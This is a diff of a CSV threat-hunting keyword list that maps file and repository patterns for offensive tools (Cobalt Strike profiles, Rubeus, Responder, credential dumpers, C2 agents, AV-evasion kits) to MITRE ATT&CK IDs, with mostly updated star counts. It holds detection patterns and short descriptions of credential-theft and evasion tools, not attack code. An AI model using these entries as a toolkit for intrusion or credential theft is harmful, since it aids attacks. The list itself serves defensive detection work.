 "*/Farmer.git*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
 "*/fastfuz-chrome-ext*","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","23","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z"
-"*/fb_firstlast.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z"
+"*/fb_firstlast.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z"
 "*/fb-brute.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
 "*/fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/febinrev/dirtypipez-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z"
 "*/fern-wifi-cracker/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/ffuf.git*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
-"*/ffuf/ffufrc*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*/ffuf.git*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*/ffuf/ffufrc*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
 "*/fiesta.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
 "*/fiesta2.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
-"*/FilelessPELoader*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
-"*/final_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
+"*/FilelessPELoader*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*/final_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
 "*/find_domain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*/find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*/FindModule.c*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z"
 "*/FindObjects.cna*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z"
-"*/FindSQLSrv.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*/FindSQLSrv.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
 "*/finger.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/fingerprint-strings.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/firefox_decrypt.git*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
-"*/firefox_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/firefox_decrypt.git*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
+"*/firefox_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
 "*/firewalk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/firewall-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/flask:5000/supershell/*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/flatten-macho.m*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/flask:5000/supershell/*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/flatten-macho.m*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Fodetect-hooksx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*/ForgeCert.git*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*/forkatz.filters*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*/forkatz.git*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" -"*/format:hashcat*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/format:hashcat*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*/FourEye.git*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/fox-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/fox-it/BloodHound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. 
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/fox-it/BloodHound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*/freelancer-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Freeze.rs*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*/freyja.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/freyja_tcp/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/fritzone/obfy*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","122","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*/fritzone/obfy*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" 
